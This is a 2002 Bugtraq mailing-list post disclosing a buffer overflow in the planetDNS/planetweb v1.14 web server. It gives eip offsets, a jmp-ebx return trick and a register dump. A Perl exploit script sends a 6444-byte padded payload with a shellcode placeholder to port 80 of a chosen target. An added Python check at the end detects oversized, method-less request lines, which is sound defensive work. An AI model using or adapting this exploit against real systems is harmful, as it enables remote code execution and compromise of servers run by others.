Bugtraq mailing list archives

New buffer overflow in planetDNS


From: securma massine <securma () caramail com>
Date: Thu, 17 Oct 2002 12:24:54 GMT+1

hi
planetdns ( http://www.planetdns.net ) is a commercial software package that allows you to turn your computer into an Internet server: you can create an Internet name and connect to a web server, FTP server, mail server, etc. running on your computer.
planetdns is vulnerable to a buffer overflow with an overwrite of eip (never posted before)... someone already reported that 1024 bytes could crash the server, and I found that sending 6500 bytes (without GET /) overwrites eip and so allows execution of a shellcode; the overwrite is done with bytes 6449, 50, 51, 52.
One also notices that ebx is always 4 bytes before eip, so the ret address will be a jmp ebx or call ebx, which is found in many loaded modules.
I made an exploit, tested on planetweb v1.14, which gives the following register state:
Access violation - code c0000005 (first chance)
eax=0217dfb0 ebx=0217ffdc ecx=41414141 edx=7846f5b5 esi=0217dfd8 edi=00000000
eip=41414141 esp=0217df18 ebp=0217df38 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
43434343 ?? ???
exploit code:
#!/usr/bin/perl -w
# tool bop.pl
# buffer overflow tested against planetweb v1.14
# humm..this exploit is not for lamers...
# Greetz: marocit and #crack.fr (especially christal...
# the less hard you pedal, the less you go forward faster..)
#

use IO::Socket;
if ($#ARGV < 0)
{
 print "\n write the target IP!! \n\n";
 exit;
}

$shellcode = "YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; # add your favorite shellcode
$buffer = "A" x 6444;              # padding up to the saved ebx
$ebx = "\x90\xEB\x08\x90";         # you have the chance because ebx = eip - 4 bytes: jmp short 0xff x0d3
$ret = "\x43\x43\x43\x43";         # insert your ret address (jmp ebx or call ebx)
$minibuf = "\x90\x90\x90\x90";     # will be jumped over by EB08
$connect = IO::Socket::INET->new(Proto    => "tcp",
                                 PeerAddr => "$ARGV[0]",
                                 PeerPort => "80");
unless ($connect) { die "cant connect $ARGV[0]" }
print $connect "$buffer$ebx$ret$minibuf$shellcode";
print "\nsending exploit......\n\n";

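A defender-side check for the request pattern the post describes (an oversized request line with no HTTP method and a long run of one padding byte), added here as an example and not part of the original post. The 1024-byte and 6500-byte figures come from the post; the sample requests are constructed, and the 256-byte run threshold is an assumption.

```python
import re

# Thresholds from the post: ~1024 bytes already crashed the server,
# ~6500 bytes sent without a request method overwrote eip.
CRASH_THRESHOLD = 1024
RUN_THRESHOLD = 256  # assumed: a run this long is padding, not a real URL
HTTP_METHODS = {b"GET", b"HEAD", b"POST", b"PUT", b"DELETE",
                b"OPTIONS", b"TRACE", b"CONNECT"}


def longest_run(data: bytes) -> int:
    """Length of the longest run of a single repeated byte (e.g. "A" x 6444)."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best


def inspect_request(raw: bytes) -> dict:
    """Classify the first line of a raw HTTP request against the overflow pattern."""
    first_line = re.split(rb"\r?\n", raw, maxsplit=1)[0]
    method = first_line.split(b" ", 1)[0]
    findings = {
        "line_length": len(first_line),
        "has_method": method in HTTP_METHODS,
        "longest_run": longest_run(first_line),
        "oversized": len(first_line) > CRASH_THRESHOLD,
    }
    # Oversized alone would already have crashed the server per the post; the
    # missing method or long padding run is what marks a deliberate overflow.
    findings["suspicious"] = findings["oversized"] and (
        not findings["has_method"] or findings["longest_run"] >= RUN_THRESHOLD
    )
    return findings


# Constructed samples, not captured traffic.
BENIGN = b"GET /index.html HTTP/1.0\r\nHost: example.test\r\n\r\n"
PADDED = b"A" * 6500 + b"\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("padded", PADDED)):
        print(name, inspect_request(req))
```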